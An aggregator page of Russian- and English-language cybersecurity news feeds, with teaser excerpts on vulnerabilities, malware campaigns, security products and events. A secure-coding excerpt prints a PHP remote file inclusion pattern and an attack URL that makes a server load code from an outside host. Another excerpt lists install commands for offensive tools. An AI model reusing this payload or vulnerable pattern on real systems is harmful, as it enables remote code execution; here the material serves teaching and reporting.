Cybersecurity
👉 by %username%
A collection of cybersecurity resources
In Russian 🇷🇺
Securitylab
last post 1 hour ago
Chemists synthesized a "sandwich molecule" predicted 20 years ago

Alexander Antipov
Lithium and aluminium atoms surrounded by carbon rings formed a stable sandwich complex.

Scientists from Saarland University, led by Dr. André Schäfer, achieved a breakthrough in inorganic chemistry by synthesizing a unique molecule: a heterobimetallic dimetallocene.

However, until recently all attempts to create such a molecule in the laboratory had ended in failure.

According to Bischoff, the choice of carbon rings and metals was critical, since their electronic structures must match.

The Saarland University team's discovery may open new horizons in chemistry and industry, offering уни…

1 hour ago @ securitylab.ru
How an "ice cube" helps reveal the secrets of the Universe

Scientists are testing quantum gravity at IceCube.

2 hours ago @ securitylab.ru
Technology against us: a deepfake cost Arup 20 million pounds

Criminals used fake video calls to steal money.

3 hours ago @ securitylab.ru
OWASP dep-scan: an open-source security audit tool

A free tool for analyzing vulnerabilities and license restrictions.

3 hours ago @ securitylab.ru
The world's smallest light detector on a silicon chip has been created in the UK

An innovative device from Bristol is set to change the world of quantum computers.

4 hours ago @ securitylab.ru
Space "warehouse": cargo delivery to any point on Earth within an hour

Inversion Space will launch the technology aboard the SpaceX Transporter-12 mission in October this year.

5 hours ago @ securitylab.ru
ZeroGPU for the masses: Nvidia GPUs for the benefit of neural network development

Hugging Face will provide free computing power to developers in the AI field.

16 hours ago @ securitylab.ru
VIEWSTATE deserialization: how the vulnerability is used by pro-government groups

Solar 4RAYS disclosed details of an Obstinate Mogwai attack on a telecom company.

16 hours ago @ securitylab.ru
Open Glass: $20 smart glasses can speak in the voice of any AI chatbot

At a simple hackathon, enthusiasts created a breakthrough technology accessible to everyone.

18 hours ago @ securitylab.ru
Free Europe: Apple restricts the development of alternative browsers in the EU

The corporation has found a cunning way to strangle competitors while circumventing the law.

19 hours ago @ securitylab.ru
The main thing is not to let the farmers down: Lemken seeks ways to recover after a hacker attack

The largest agricultural machinery manufacturer is concerned about the safety of its customers and employees.

19 hours ago @ securitylab.ru
Deuterbear RAT attacks Asia: how the BlackTech malware surprised researchers

Having emerged as an evolution of Waterbear, the new trojan pursues more specific targets…

20 hours ago @ securitylab.ru
Gomir: a new tool from North Korean hackers for attacks on Linux

South Korean government networks have felt the trojan's power firsthand.

20 hours ago @ securitylab.ru
$147.5 million laundered through Tornado Cash: the UN uncovered North Korea's criminal scheme

How the DPRK finances itself through cryptocurrency theft.

20 hours ago @ securitylab.ru
The most common four-digit PIN codes that can undermine your security have been revealed

Why is the combination "1004" so popular in South Korea? The secret is out.

20 hours ago @ securitylab.ru
Anti-Malware
last post 2 days ago
Review of Solar NGFW 1.2, a next-generation firewall

Solar NGFW 1.2 is a next-generation firewall that provides comprehensive protection of the corporate network and control of access to web resources.

One of the new domestic developments of this kind is the Solar NGFW next-generation firewall, built on the technological base of Solar webProxy.

Solar NGFW in the network infrastructure
System requirements of Solar NGFW
Solar NGFW is distributed both as a hardware-software appliance and as a virtual solution (a RUN file) for virtualization environments.

Access rules without authentication in Solar NGFW
Main dashboard
The Solar NGFW web console dashboard contains two tabs: "Monitoring" and "Statistics".

Creating a rule in Solar NGFW
Трансл…

2 days ago @ anti-malware.ru
The Russian NGFW market: what will change after the release of Solar NGFW

ГК «Солар» has also announced the release of its own model, Solar NGFW.

Alexander Barinov, director of the network security product portfolio at ГК «Солар»
The Solar NGFW solution can become the core element of a unified network security ecosystem.

Solar NGFW is built into the conceptual architecture of Solar Dozor
Note that Solar Dozor implements a patented User Behavior Analytics (UBA) technology.

The Solar NGFW device from the inside
The release of the new Solar NGFW product is doubly interesting.

Real-time testing of IPS effectiveness in the Solar NGFW interface was also carried out.

2 days, 19 hours ago @ anti-malware.ru
Review of vGate 4.9, a firewall for protecting the virtual machine life cycle

Survey of respondents on the virtualization tools used in 2024
Several distinct demands for virtualization tools are currently taking shape on the Russian market.

Survey of respondents on the company's virtualization strategy
We previously published reviews of vGate versions 4.7 and 4.5.

The problem of protecting virtualization in Russia
When addressing the protection of virtualization tools in Russia, their owners face a number of difficulties.

Another important element of the infrastructure is the vGate monitoring server, which collects and correlates information from vGate agents and monitors the state of the protected systems.

Working with filtering rules in vGate
When creating filtering rules, the source…

3 days, 1 hour ago @ anti-malware.ru
Kaspersky ASAP: teaching the basics of safe email use

The main types of threats to email traffic in a corporate network include phishing attacks, malicious attachments and links, spam, and data leaks.

One option for raising employees' information security awareness is the Kaspersky ASAP platform.

One of ASAP's key functions is the ability to run email campaigns to train and inform employees about the rules of safe online behavior.

Example of a slide from a lesson
Creating a training phishing campaign
This component lets you test employees' practical skills in resisting phishing attacks.

Anti-phishing plugin settings page
Conclusions
The email campaign functionality in K…

4 days, 1 hour ago @ anti-malware.ru
DDoS attacks: what's new and how to repel them successfully in 2024

We explain what they look like today and how to fight them.

L7 attacks target vulnerabilities in web applications and services; methods such as HTTP floods and attacks on CMS vulnerabilities make them especially dangerous for business.

Blockchain and cryptocurrencies are used for anonymous payments for DDoS attacks, reducing the risks for those who order them and making DDoS-as-a-service easier to access.

This requires building profiles of normal traffic and detecting deviations from them in real time, taking into account request rates, protocols, content types, and geography.

Kaspersky Lab successfully repelled a record attack on educational resources using intelligent traffic filtering and dedicated инфр…

4 days, 22 hours ago @ anti-malware.ru
Is container virtualization possible in Russia?

Introduction
Container virtualization, which allows applications to be packaged and deployed in isolated, portable environments, has become a revolutionary technology in the IT world.

Roman Karpov shared his experience with colleagues and noted that a hybrid approach is useful both for optimizing cost and for ensuring information security.

Konstantin Aksenov noted that an undoubted advantage of a Russian system would be sufficient experience on the part of its producer, both in development and in operation.

Konstantin Aksenov expects that in the coming years organizations will actively adopt innovative processes and use containers to optimize their operations.

Growth is expected over the next two to three years …

1 week, 3 days ago @ anti-malware.ru
Russian and foreign information security services that use artificial intelligence

Introduction
The application of artificial intelligence in information security takes the form of a set of innovative tools and technologies that help automate the detection and analysis of cyber threats, as well as the response to them.

The overall result of applying artificial intelligence in information security is greater effectiveness of data protection measures and reduced risk.

Taking these criteria into account, organizations can make an informed choice of AI tools that help raise their information security level and reduce cyber risks (see our article "Forecast of the Development of Cyber Threats and Information Protection Tools, 2024").

It uses technologies of искусственно…

1 week, 4 days ago @ anti-malware.ru
How to improve the effectiveness of protection through process automation

AM Live experts discussed what ideal automation in information security should look like.

We assess the advantages and disadvantages of automation in information security and look at the practical aspects of its implementation.

The importance of automation in information security
What is behind the heightened attention to automation in information security?

According to guest expert Sergey Shiryaev from АРСИБ, the risks may stem from choosing the wrong automation tool and configuring it incompetently.

Experts predict further development of automation in information security, including the use of artificial intelligence and machine learning to improve accuracy and effectiveness.

1 week, 5 days ago @ anti-malware.ru
What AI developments T1 Holding will pursue, and why

Second, there is still no consensus on whether adopting AI in various fields is fundamentally worthwhile, or to what degree it should be adopted.

Numerous rumors about the use of AI for military purposes and for national security should also be noted.

Overall, Russia's AI development strategy had taken shape by 2019.

T1 Holding and AI
Global trends indicate that it is now important for Russia to gain new vendors that will develop industrial AI solutions and scale them.

We want to offer the market a fundamentally new level of turnkey technology products and services in big data and AI.

2 weeks, 1 day ago @ anti-malware.ru
Why cybercriminals use some programming languages more often than others

We explain what makes PowerShell, Bash, and JavaScript attractive to cybercriminals, what the secret of C/C++'s popularity is, and how not to fall victim to malicious Python applications.

Note that the AM Live TV project recently discussed how to organize the Vulnerability Management process in 2024.

Which programming languages are most often used for attacks
It is important to bear in mind that a programming language is merely a tool.

Python is one of the least popular languages among malware authors
There are programming languages that attackers turn to far less often; Python is one of them.

Using information security tools in совок…

3 weeks ago @ anti-malware.ru
Attacks on web applications in 2023: an analysis of attacker actions

Companies in every industry are feeling the growth in attacks on their web applications.

We describe the distribution by type of the attacks on telecom companies and online platforms recorded among users of the «Вебмониторэкс» platform in 2023, as well as ways to defend against them.

The analysis included assessing various attack types and risks in order to determine the overall level of application security.

Common attacks on telecommunications organizations
An RCE attack aims to exploit vulnerabilities to execute code remotely in web applications.

Regularly checking passwords for weakness and for presence in leaked databases.

3 weeks ago @ anti-malware.ru
SafeMobile 8.3, a unified endpoint management system

COPE (Company Owned, Personally Enabled) means the company itself provides the employee with a mobile device but allows it to be used for personal purposes as well.

Different approaches require different policies for the same mobile OSes and devices.

Such products focused on using gadgets exclusively for corporate purposes and on separating the user's personal and work data.

These mechanisms are standard, so if your developers or suppliers have already implemented them for the foreign UEM vendor whose product you used previously, no modifications will be required for SafeMobile.

Detailed documentation for both the administrator and the user, as well as for д…

3 weeks, 1 day ago @ anti-malware.ru
The MTS RED Anti-DDoS and MTS RED WAF tandem: how to protect web applications from attacks properly

In February this year, a new web application protection service, MTS RED WAF, appeared on the Russian information security market.

We describe how this service, together with MTS RED Anti-DDoS, protects companies from a range of attacks on web resources, and what the benefit of such a tandem is.

In April, Anti-Malware.ru published an up-to-date review of the web application firewall (WAF) market, which, among others, features the MTS RED web application protection service.

How the web application protection service works
Once a company decides to connect to the web application protection service, the IP addresses of the protected web resources are changed on the DNS servers from the owner's addresses to those of the protection service provider.

This is convenient, for example, if the company…

3 weeks, 2 days ago @ anti-malware.ru
The pitfalls of Purple Teaming

We discuss the problems of implementing Purple Teaming from both the customer's and the contractor's side.

Defenders' problems
First and foremost, Purple Teaming is needed by the defense team.

Only Purple Teaming will effectively reveal blind spots, the real "black holes", the hidden corners of your network.

They need to perform practically the same actions as in Red Teaming (or, very rarely, as in a typical pentest).

In that case, nobody interacts with the experts conducting the Purple Teaming and nobody asks for help.

3 weeks, 2 days ago @ anti-malware.ru
How to organize the Vulnerability Management process in 2024

The vulnerability management process
Stages of vulnerability management
So what is Vulnerability Management (VM) in Russia?

A vulnerability management model cannot be sufficiently complete without such an important stage as full preparation of the infrastructure, noted Anastasia Kuznetsova.

Implementing Vulnerability Management
The host asked the speakers how to assess an organization's readiness to implement a full-fledged vulnerability management process.

Within three to five years, customers will better understand their vulnerability management needs and the solutions available to them.

3 weeks, 3 days ago @ anti-malware.ru
Habr: Information Security
last post 17 hours ago
Will an NDA help if an SMM specialist decides to "leak" the password to the company's account

An account login and password are confidential information that a specialist must not disclose to third parties.

The main reason is that the company has not established a trade secret regime.

Excerpt from the Trade Secret Regulation
Excerpt from the list of information relating to the company's security
Such a Regulation is then approved by an order of the head of the company.

Only in that case will the "Trade Secret Agreement" with the SMM specialist work, and it will become possible to actually protect the secret data: the social media account login and password.

Give us the password, don't upset Leonid Arkadyevich
What do you think: is it realistic to prove that it was the SMM specialist who "leaked" the password to an outsider?

17 hours ago @ habr.com
VIEWSTATE deserialization: the Solar 4RAYS team studied a cyberattack by an Asian group exploiting an "incompletely closed vulnerability"

● 2020-006 on detecting exploitation of VIEWSTATE deserialization and a vulnerability in Telerik software, and on responding to such attacks.

● May 2021: as in June 2020, the attackers exploited VIEWSTATE deserialization in a proprietary web application.

If the attacker wants to execute a PowerShell command again, the same POST request containing a VIEWSTATE with the Ps assembly will be sent, but with a different cadata parameter.

The master key is stored in the registry and is subsequently used to generate the keys that directly take part in validation and decryption.

We hope you found a lot of useful information in our article about the VIEWSTATE deserialization vulnerability and ways of detecting под…

21 hours ago @ habr.com
JavaScript obfuscation and deobfuscation: basics and tools

What obfuscation is
JavaScript obfuscation is a process that makes JavaScript source code less understandable to people while preserving its functionality for the computer or browser.

Program code written in interpreted languages such as Python, PHP, and JavaScript can be published without compilation.

That is why obfuscation is often applied to JavaScript.

JavaScript obfuscation is an important step in protecting web applications and scripts from unauthorized access and tampering.

Packing JavaScript
The method involves renaming variables and functions, changing the order of operations, adding bogus constructs, and generally making the code confusing.

1 day, 22 hours ago @ habr.com
SOC analyst: on skills, career growth and… bears

SOC tiers: what's the difference
Let's start with the fact that tiering in a SOC is very loosely defined.

In most cases this is the entry point to the SOC: it takes young specialists, students, and interns without experience but with a good theoretical foundation.

If an intern completes the training successfully and is seen as a promising specialist, they may be offered a staff position.

For example, Tinkoff and Positive Technologies have launched an educational program for current and future SOC employees at the Central University and are preparing a joint master's program in cybersecurity.

And this model, where everyone is open, proactive, and motivated both in personal growth and in the development of the team as a whole, is what I try to восп…

1 day, 23 hours ago @ habr.com
7 main types of web vulnerabilities every backend developer should know about

In it, we described how we introduced our own methodology for teaching web security to new employees, but did not go into detail on each web vulnerability.

We split the vulnerabilities into two groups: Server Side for backend developers and Client Side for frontend developers.

Example:
Code in the project:
$file = $_GET['template']; include($file);
Script invocation:
/view.php?template=http://some.site/remote_code.php
It is important to note that PHP on the attacker's side must not be executed and does not need to be installed, i.e. the file's code must be served in raw form.

Thus, a hacker can inject code into an input field or a URL and make the server execute it as part of the template.

The executed scripts can be contained in о…

2 days, 1 hour ago @ habr.com
pgAdmin4 CVE-2024-3116

This vulnerability leads to remote code execution in the server version of pgAdmin4 ≤ 8.4 on Windows systems.

pgAdmin4 has an interesting feature: the ability to specify the path to the utilities used to work with postgres, for example psql, pg_dump, pg_dumpall, pg_restore.

This is exactly where the vulnerability lies, which we can exploit by uploading to the storage our executable file under any name from the UTILITIES_ARRAY array.

Conclusion
Today we looked at a remote code execution vulnerability in pgAdmin4.

If you use pgAdmin4 in server mode, it is recommended to update to the latest version to avoid possible exploitation by attackers.

2 days, 20 hours ago @ habr.com
Threats under control: using ML for automatic report analysis

Moreover, up to 80% of the time will be spent on the first item, since the quality of the trained model depends first of all on the quantity, variety, and quality of the training data.

All of this evolves dynamically and requires regular adjustments to the model and to the NER mechanisms as a whole.

We constantly run experiments training the model on newly accumulated reports from current sources and on the basis of internal feedback.

On the test set we compared a model trained on a balanced dataset with a model trained on imbalanced data.

In our situation, the overrepresentation of the Malware_name class turned out to be insignificant for the model, while reducing it led to a loss of context for други…

2 days, 20 hours ago @ habr.com
Hacking a network with an ESP32

Introduction
The ESP family of microcontrollers has a host of applications, both in everyday life and in niche industries.

WARNING
It is important to note that the ESP32 board firmware for testing Wi-Fi for vulnerabilities must be used exclusively for lawful and ethical purposes.

ESP32 Wi-Fi Penetration Tool
The project is a universal tool on the ESP32 platform for carrying out attacks on Wi-Fi.

EAPOL provides protection against unauthorized access and supports various authentication methods such as EAP-TLS, EAP-TTLS, PEAP, and others.

Practice
We select our network and the attack type, and choose active capture (deauthentication of users) as the method.

2 days, 22 hours ago @ habr.com
Focus on mobile application security

At «Стингрей Технолоджиз» we publish an annual report assessing the security level of Russian mobile applications by industry.

In my view, the era of modern mobile applications was started by Apple after the launch of the iPhone 4 in 2010, which already shipped with the iOS operating system.

Google followed, and since then the mobile app market has taken up most of the digital space and soon overtook other channels in the number of active users.

Let's take a closer look at several features of applications and consider how they affect security.

And who knows what exactly is going on in the countless no-name devices and what exactly the manufacturers changed inside?

2 days, 23 hours ago @ habr.com
SOC internships. Part 2: how to create the ideal training program

But the roadmap says: "Study this module because you will need it to understand the next topic, and together all of this will be useful when working in a SOC."

We transfer the roadmap onto the schedule of the training track, the curriculum, the training program, and the training materials themselves.

The fundamental part
The next level consists of a fundamental part written out in detail, like a textbook.

You need to assess the course's potential audience and make sure there is demand for the material, so that the work does not end up on a shelf.

For example, leave several flags in the assignment (as in a CTF, Capture-the-Flag) and then ask them to enter these in the test.

2 days, 23 hours ago @ habr.com
10 types of threats to start ICS security monitoring with

On projects at various companies we often encounter practical questions about how to build information security monitoring in ICS environments.

An attacker who has gained access to the network and is moving through it may end up in the process network and do something nasty there.

Unauthorized reads and writes of PLC tags
Why this matters
Tags, or process signals, are the usual name for variables in PLC memory that contain either the current value of a measured physical parameter or the operating mode of a particular subprocess in the PLC.

Of course, the mere fact that a project file was modified or transmitted over the network does not by itself indicate an attacker in the network.

As a rule, every ICS vendor has standard …

2 days, 23 hours ago @ habr.com
What a WAF is and how to work with it. Demonstrated with a vulnerable web application

3 days, 1 hour ago @ habr.com
[Translation] Developing malware for macOS: shellcode injection and persistence

This is often used to intercept function calls, manipulate program behavior, and even add malicious functionality to a benign application.

Memory can be marked as readable (R), writable (W), executable (E), and as combinations of these three.

The message "Hello World!" is printed, confirming that the shellcode executes as expected and produces the desired output.

Although LaunchAgents mostly operate within user sessions, they can also be found in system folders such as /System/Library/LaunchAgents.

Writing malware takes time and energy, so they aim for the minimum that can be achieved without effort.

3 days, 21 hours ago @ habr.com
[Translation] Developing malware for macOS: building a skeleton

In this article we dive into the world of designing and developing malware for macOS, which is essentially a Unix-based operating system.

Our plan is as follows:
Start with an introduction to the macOS architecture and its security features;
Then go deeper into the internals and look at the key elements: the Mach API and the kernel;
Build a malware skeleton.

In this section we mainly look at security protections and, in particular, System Integrity Protection (SIP).

To begin, let's write code that writes a copy of itself either to /usr/bin/ or to /Library/.

Nevertheless, deploying the mock-up lets attackers obtain a substantial amount of information, ко…

3 days, 21 hours ago @ habr.com
Can LLM agents hack websites and exploit vulnerabilities?

For example, ChatGPT can be used to help people with penetration testing and to create malware.

15 vulnerabilities were selected, covering vulnerabilities in web applications, in container management software, and in Python packages.

Conclusions
The study demonstrated that LLM agents can already autonomously hack websites and exploit some real vulnerabilities in computer systems (and, given a description of how to exploit them, most of them).

However, it is possible that in the future extensions will appear that can exploit such vulnerabilities too, and that freely available LLMs will repeat the success of their proprietary counterpart.

3 days, 23 hours ago @ habr.com
Хакер
last post 13 hours ago
An SSID Confusion vulnerability found in Wi-Fi lets attackers "listen in" on other people's traffic

The problem makes it possible to trick a victim into connecting to a less secure wireless network and to eavesdrop on the user's network traffic.

It affects all operating systems and Wi-Fi clients, including home and mesh networks based on the WEP, WPA3, 802.11X/EAP and AMPE protocols.

As a result, an attacker can trick a user into connecting to an untrusted Wi-Fi network instead of the one they originally intended to join, carrying out an adversary-in-the-middle (AitM) attack.

"In our attack, when the victim wants to connect to the TrustedNet network, we trick them into connecting to another network, WrongNet, which uses similar credentials, …

13 hours ago @ xakep.ru
New Android 15 and Google Play Protect features will fight scammers and malware

At the recent Google I/O 2024 conference, developers announced several new protective features coming to Android 15 and Google Play Protect that will help fight fraud, scams and malicious apps on users' devices.

It also became known that the new functionality will appear in Google Play Protect as well.

Known malware risk: before performing important actions or working with confidential data, developers will be able to check whether Google Play Protect is active and whether there is known malware on the user's device.

14 hours ago @ xakep.ru
Qrator Labs: most DDoS attacks in the first quarter hit the e-commerce segment

Specialists say that in the first quarter of 2024 the number of mixed multi-vector attacks almost doubled, reaching a 23.22% share, which is attributed primarily to the increase in capacity available to attackers.

As already mentioned above, the largest number of attacks in the first quarter fell on the e-commerce segment (25.26% of all attacks).

While the longest attack took place in the online-store segment and lasted almost three weeks, the second-longest attack was recorded in the online-betting segment and lasted 72 hours.

On that day 22,258,587 requests were recorded (which is almost 27% less than the peak attack of the fourth quarter of 2023 in the online… segment

15 hours ago @ xakep.ru
Positive Hack Days 2 will take place in Moscow from May 23 to 26

This year the second international cyberfestival Positive Hack Days will be held from May 23 to 26 at the Luzhniki sports complex in Moscow.

At the popular-science hack-fest venue, all participants will have the opportunity to immerse themselves in the world of digital technologies and meet their creators.

Festival guests will be able to get hands-on with the achievements of Russian science in information technology and cybersecurity.

"This year Positive Hack Days will be held for the first time at the Luzhniki sports complex and for the second time in the format of a large city cyberfestival," says Victoria Alekseeva, program director of PHDays Fest 2.

Participation in the youth day of the cyberfestival is free.

17 hours ago @ xakep.ru
Former MIT students accused of stealing $25 million in cryptocurrency in 12 seconds

Brothers Anton Peraire-Bueno and James Peraire-Bueno were arrested earlier this week in Boston and New York.

And, according to the authorities, the brothers' hacking scheme was so sophisticated that it "calls into question the very integrity of the blockchain."

And once they set their plan in motion, the heist took only 12 seconds," says U.S. Attorney Damian Williams.

In essence, the scheme exploited the Ethereum blockchain in the moments after transactions were submitted but before they were added to the blockchain.

If convicted, each of them faces a maximum sentence of 20 years in prison on each count.

20 hours ago @ xakep.ru
A quest for «Хакер» readers is starting!

This year «Хакер» celebrates its 25th anniversary, and today, as an experiment, we are launching a small bit of entertainment.

It is a hacker quest that is meant to keep you busy over the weekend.

This is our first experience organizing such quests, so we can only roughly estimate the difficulty and the time needed to solve it.

We warn you right away that in terms of offensive security the quest involves reconnaissance only.

If you happen to break something, please do not touch anything and report your achievement by writing to the person in charge on Telegram (@electric_panda).

21 hours ago @ xakep.ru
Android will get protection in case of device theft or loss

Google has announced a number of new features for Android designed to protect devices from theft and data loss.

Some of them will only be available on devices running Android 15 and above, but others are planned to be rolled out to billions of devices running Android 10 and older versions.

Google also announced a Remote Lock feature that will help people whose Android devices have already been stolen.

The Theft Detection Lock, Offline Device Lock and Remote Lock features are expected to be available on devices running Android 10 or higher via a Google Play services update later this year.

"With this update, if a thief forc…

22 hours ago @ xakep.ru
Infostealers on GitHub masquerade as legitimate software

Recorded Future has warned of a malicious campaign in which attackers used a legitimate GitHub profile to distribute infostealers.

According to the researchers, hackers located in the CIS distributed via GitHub malware such as Atomic macOS Stealer (AMOS), Vidar, Lumma and Octo, disguising it as legitimate applications including 1Password, Bartender 5 and Pixelmator Pro.

Using these reports as a starting point, Recorded Future was able to discover 12 sites advertising macOS software that ultimately redirect users to a GitHub profile distributing AMOS.

The GitHub account belongs to a user with the handle papinyurii33 and was created on 16 Janua…

1 day ago @ xakep.ru
In 15 years the Ebury botnet has compromised more than 400,000 Linux servers

The Ebury botnet, which has existed since 2009, has infected almost 400,000 Linux servers, and about 100,000 of them are still compromised, ESET analysts report.

ESET has been tracking Ebury for more than ten years, and this week the researchers said that recent law enforcement actions gave them insight into the malware's activity over the past fifteen years.

"While 400,000 is a huge number, it is important to note that this is the total number of compromises over almost 15 years.

However, every time we managed to measure the number of servers compromised by Ebury, whether 10 years ago or in the last few years, we got around 40,000 IP addresses.

The researchers wr…

1 day, 13 hours ago @ xakep.ru
Microsoft fixed 60 vulnerabilities, including a bug exploited by QakBot

Desktop Window Manager is a Windows service that first appeared in Windows Vista and lets the OS use hardware acceleration when rendering graphical user interface elements.

The file name hinted that it might contain information about a vulnerability in Windows.

This problem, which was under active attack, is related to bypassing the OLE protection added to Microsoft 365 and Microsoft Office to protect users from vulnerable COM/OLE controls.

Microsoft also states that the above-mentioned vulnerability CVE-2024-30051 was publicly disclosed as well, though it is unclear where exactly.

In addition, Microsoft reports that a denial-of-service vulnerability in Microsoft Visual Studio (CVE-2024…

1 day, 15 hours ago @ xakep.ru
Tornado Cash co-founder sentenced to five years and four months in prison

Alexey Pertsev, one of the developers of the Tornado Cash cryptocurrency mixer, was sentenced to 64 months in prison in the Netherlands for participating in laundering more than $2 billion in cryptocurrency.

U.S. citizens and other persons in the United States also lost the ability to do business with Tornado Cash without special permission from OFAC.

At trial, Pertsev himself claimed that he only wanted to provide privacy for the cryptocurrency community and did not break the law by supporting criminal operations.

As a result, according to Dutch law enforcement, between $1.2 and $2.2 billion obtained from at least 36 different cyberattacks was laundered through Tornado Cash.

Tornado Cash effectiv…

1 day, 20 hours ago @ xakep.ru
Google patches third 0-day vulnerability in Chrome this week

Google has released yet another emergency update for its Chrome browser to fix the third zero-day vulnerability this week that is already being used by hackers in attacks.

The fresh 0-day received the identifier CVE-2024-4947, and the developers warn that an exploit for this problem already exists and it is already being used in real attacks.

The company fixed the bug with the release of versions 125.0.6422.60/.61 for Mac and Windows and version 125.0.6422.60 for Linux.

Recall that this is already the third zero-day vulnerability in Chrome fixed in the past week: earlier Google engineers released urgent patches for CVE-2024-4671 and CVE-2024-4761.

Thus, in 2024 Chrome has already fix…

1 day, 22 hours ago @ xakep.ru
Virtual Magic 2. Using emulation and virtualization in attacks

If you decide to build an x64 image, installing many packages will be easier and will not require some of the dependencies.

If we use coerce in combination with Kerberos, we definitely bring along the following tool: git clone https://github.com/dirkjanm/krbrelayx

It also won't hurt to use the much-discussed ADCS privilege escalation techniques: pip3 install certipy-ad git clone https://github.

Among them is a vulnerability in the Windows print subsystem: git clone https://github.

2_linux_386.zip nuclei -d /usr/local/bin/ git clone https://github.

1 day, 22 hours ago @ xakep.ru
FBI shuts down BreachForums for the second time

The site currently displays a message stating that the resource and all backend data have been seized by the FBI.

The FBI is now urging victims and others to report any information about the BreachForums and Raidforums hacking forums and their members to help with the investigation.

"From June 2023 to May 2024, BreachForums (located at breachforums[.

Earlier, from March 2022 to March 2023, a separate version of BreachForums (hosted at breached[.

At the time, prosecutors stated that under Fitzpatrick, access to the personal information of millions of U.S. citizens was "leaked" on BreachForums.

2 days ago @ xakep.ru
Malicious PyPI package used the Sliver framework to attack macOS

The malware was intended for attacks on macOS devices with the aim of subsequently gaining access to corporate networks, and used the Sliver framework in its attacks.

The new attack, spotted by Phylum specialists, begins with a malicious Python package for macOS named requests-darwin-lite.

The package, hosted on PyPI (now removed), contained a Sliver binary inside a 17 MB PNG file with the Requests logo.

The UUID was used to verify that the package was being installed on a real machine, by comparing it against predefined UUIDs.

Apparently, this is why the attackers eventually restored the package to its normal state, not wanting to attra…

2 days, 17 hours ago @ xakep.ru
In English 🇺🇸
The Hacker News
last post 15 hours ago
Kinsing Hacker Group Exploits More Flaws to Expand Botnet for Cryptojacking

The cryptojacking group known as Kinsing has demonstrated its ability to continuously evolve and adapt, proving to be a persistent threat by swiftly integrating newly disclosed vulnerabilities to exploit arsenal and expand its botnet.

Kinsing (aka H2Miner), a name given to both the malware and the adversary behind it, has consistently expanded its toolkit with new exploits to enroll infected systems in a crypto-mining botnet.

Subsequent analysis by CyberArk in 2021 unearthed commonalities between Kinsing and another malware called NSPPS, concluding that both the strains "represent the same family."

Kinsing's attack infrastructure falls into three primary categories: Initial servers used for…

15 hours ago @ thehackernews.com
New XM Cyber Research: 80% of Exposures from Misconfigurations, Less Than 1% from CVEs

The XM Cyber Attack Graph Analysis(™) identifies the key intersections where multiple attack paths toward critical assets converge as "choke points".

They are especially dangerous because compromising just one can expose a significant portion of critical assets.

Finding and Categorizing Exposures: Focus on Critical Assets. Where are exposures and how do attackers exploit them?

Active Directory remains the cornerstone of organizational identity management – yet the report found that 80% of all security exposures identified stem from Active Directory misconfigurations or weaknesses.

Transportation and Energy have a much higher percentage of critical exposures, despite having fewer overall vulne…

21 hours ago @ thehackernews.com
China-Linked Hackers Adopt Two-Stage Infection Tactic to Deploy Deuterbear RAT

"Comparing the two malware variants, Deuterbear uses a shellcode format, possesses anti-memory scanning, and shares a traffic key with its downloader unlike Waterbear."

Put differently, the first Waterbear RAT serves as a downloader while the second Waterbear RAT functions as a backdoor, harvesting sensitive information from the compromised host through a set of 60 commands.

This loader is ultimately responsible for executing a downloader, which again downloads the Deuterbear RAT from a C&C server for information theft.

Deuterbear RAT is also a more streamlined version of its predecessor, retaining only a subset of the commands in favor of a plugin-based approach to incorporate more functio…

21 hours ago @ thehackernews.com
Kimsuky APT Deploying Linux Backdoor Gomir in South Korean Cyber Attacks

The Kimsuky (aka Springtail) advanced persistent threat (APT) group, which is linked to North Korea's Reconnaissance General Bureau (RGB), has been observed deploying a Linux version of its GoBear backdoor as part of a campaign targeting South Korean organizations.

GoBear was first documented by South Korean security firm S2W in early February 2024 in connection with a campaign that delivered malware called Troll Stealer (aka TrollAgent), which overlaps with known Kimsuky malware families like AppleSeed and AlphaSeed.

A subsequent analysis by the AhnLab Security Intelligence Center (ASEC) revealed that the malware is distributed via trojanized security programs downloaded from an unspecifie…

1 day ago @ thehackernews.com
CISA Warns of Actively Exploited D-Link Router Vulnerabilities - Patch Now

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added two security flaws impacting D-Link routers to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.

"By combining an authentication bypass with command execution the device can be completely compromised," it said, adding the issues impact routers running firmware version DIRX4860A1_FWV1.04B03.

D-Link has since acknowledged the issue in a bulletin of its own, stating a fix is "Pending Release / Under Development."

It described the issue as a case of a LAN-side unauthenticated command execution flaw.

While there is no evidence that these flaws have been exploited, users are…

1 day, 2 hours ago @ thehackernews.com
New Wi-Fi Vulnerability Enables Network Eavesdropping via Downgrade Attacks

Researchers have discovered a new security vulnerability stemming from a design flaw in the IEEE 802.11 Wi-Fi standard that tricks victims into connecting to a less secure wireless network so that attackers can eavesdrop on their network traffic.

The method "involves downgrading victims to a less secure network by spoofing a trusted network name (SSID) so they can intercept their traffic or carry out further attacks," said TopVPN, which collaborated with KU Leuven professor and researcher Mathy Vanhoef.

"A successful SSID Confusion attack also causes any VPN with the functionality to auto-disable on trusted networks to turn itself off, leaving the victim's traffic exposed."

"As a result, the victim's client …

1 day, 17 hours ago @ thehackernews.com
North Korean Hackers Exploit Facebook Messenger in Targeted Malware Campaign

The North Korea-linked Kimsuky hacking group has been attributed to a new social engineering attack that employs fictitious Facebook accounts to approach targets via Messenger and ultimately delivers malware.

"The threat actor created a Facebook account with a fake identity disguised as a public official working in the North Korean human rights field," South Korean cybersecurity company Genians said in a report published last week.

The multi-stage attack campaign, which impersonates a legitimate individual, is designed to target activists in the North Korean human rights and anti-North Korea sectors, it noted.

This raises the possibility that the campaign may be oriented toward targeting specific pe…

1 day, 19 hours ago @ thehackernews.com
Researchers Uncover 11 Security Flaws in GE HealthCare Ultrasound Machines

Security researchers have disclosed almost a dozen security flaws impacting the GE HealthCare Vivid Ultrasound product family that could be exploited by malicious actors to tamper with patient data and even install ransomware under certain circumstances.

The exploit chain devised by Nozomi Networks combines CVE-2020-6977 to get local access to the device and then weaponizes CVE-2024-1628 to attain code execution.

GE HealthCare, in a set of advisories, said "existing mitigations and controls" reduce the risks posed by these flaws to acceptable levels.

The disclosure comes weeks after security flaws were also uncovered in the Merge DICOM Toolkit for Windows (CVE-2024-23912, CVE-2024-23913, an…

1 day, 22 hours ago @ thehackernews.com
Cybercriminals Exploiting Microsoft’s Quick Assist Feature in Ransomware Attacks

"Storm-1811 is a financially motivated cybercriminal group known to deploy Black Basta ransomware," the company said in a report published on May 15, 2024.

